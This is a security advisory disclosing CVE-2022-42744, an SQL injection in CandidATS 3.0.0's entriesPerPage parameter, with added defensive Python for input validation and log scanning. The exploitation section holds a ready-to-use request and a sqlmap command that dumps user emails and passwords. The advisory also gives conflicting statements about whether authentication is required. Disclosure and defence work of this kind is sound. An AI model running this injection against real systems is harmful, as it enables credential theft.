CandidATS 3.0.0 - SQLi via entriesPerPage

Summary

Name: CandidATS 3.0.0 - SQLi via entriesPerPage
Code name: Mohawke
Product: CandidATS
Affected versions: Version 3.0.0
State: Public
Release date: 2022-10-25

Vulnerability

Kind: SQL injection
Rule: 146. SQL injection
Remote: Yes
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Base Score: 8.8
Exploit available: Yes
CVE ID(s): CVE-2022-42744

Description

CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application databases. This is possible because the application does not correctly validate the entriesPerPage parameter before using it in an SQL query, leaving it open to SQL injection.

Vulnerability

The SQLi present in CandidATS 3.0.0 allows an unauthenticated remote attacker to perform CRUD operations on the application database. The vulnerability is triggered by sending an SQL payload in the entriesPerPage parameter.

Exploitation

In this attack we obtain the records containing the emails and passwords of the users. To achieve this we need three things:

candidATS.req

The application request, saved to a file:

GET /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/2
Host: demo.candidats.net
Cookie: CATS=1eiuqu2acq6t6tcguhcof52eha
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

SqlMap Command

Executing this command dumps the records of interest:

sqlmap -r candidATS.req -p entriesPerPage -D prfkvqsyht -T user -C email,password --dump

Dump DB

Finally, the dump shows that the user records were compromised.

Our security policy

We have reserved CVE-2022-42744 to refer to this issue from now on.

System Information

  • Version: CandidATS 3.0.0

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.
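Because the advisory does not reproduce the CandidATS source and no vendor patch exists, the following added example (written for this page, not the project's own code) shows in Python the two controls a defender has for a parameter like entriesPerPage: a strict allow-list check of the kind the value should pass before it reaches any SQL statement, and a scan of web-server access logs for requests to ajax.php whose entriesPerPage value is anything other than a small, bounded integer. The log lines, the combined log format and the upper bound of 500 are constructed assumptions; CandidATS may use a different limit.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed upper bound for a page-size parameter (hypothetical, not taken from
# CandidATS). The point is that the value is accepted only as a plain,
# bounded integer and never as raw text placed into an SQL statement.
MAX_ENTRIES_PER_PAGE = 500


def is_valid_entries_per_page(raw: str) -> bool:
    """Allow-list check: ASCII digits only, within [1, MAX_ENTRIES_PER_PAGE].

    Anything else (quotes, spaces, SQL keywords, empty strings, negative or
    oversized numbers) is rejected before the value can reach a query.
    """
    if not re.fullmatch(r"[0-9]{1,4}", raw):
        return False
    value = int(raw)
    return 1 <= value <= MAX_ENTRIES_PER_PAGE


# Constructed sample in Apache/nginx "combined"-style format; these are not
# real CandidATS logs. Lines 2 and 3 carry non-integer entriesPerPage values.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Oct/2022:10:00:01 +0000] "GET /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt HTTP/1.1" 200 5120
10.0.0.5 - - [07/Oct/2022:10:00:02 +0000] "GET /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15%27&sortBy=dateCreatedInt HTTP/1.1" 500 312
10.0.0.5 - - [07/Oct/2022:10:00:03 +0000] "GET /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15%20AND%201%3D1&sortBy=dateCreatedInt HTTP/1.1" 200 5120
10.0.0.7 - - [07/Oct/2022:10:00:04 +0000] "GET /index.php?m=candidates HTTP/1.1" 200 8192
"""

# Minimal parser for the fields we need: client IP, timestamp, request target
# and HTTP status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (ip, timestamp, status, decoded entriesPerPage) for every request
    to /ajax.php whose entriesPerPage value fails the allow-list check."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/ajax.php":
            continue
        # parse_qs percent-decodes, so "15%27" is examined as "15'".
        params = parse_qs(url.query, keep_blank_values=True)
        for raw in params.get("entriesPerPage", []):
            if not is_valid_entries_per_page(raw):
                findings.append(
                    (m.group("ip"), m.group("ts"), int(m.group("status")), raw)
                )
    return findings


if __name__ == "__main__":
    for ip, ts, status, value in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{ts} {ip} status={status} suspicious entriesPerPage={value!r}")
```

The same allow-list rule can be expressed as a WAF or reverse-proxy condition on the entriesPerPage query parameter while the application remains unpatched; the log scan lets a defender look back for earlier abuse, including requests that returned 500 because the injected text broke the query.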

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://candidats.net/

Timeline

2022-10-07: Vulnerability discovered.

2022-10-07: Vendor contacted.

2022-10-07: Vendor replied acknowledging the report.

2022-10-07: Vendor confirmed the vulnerability.

2022-10-25: Public disclosure.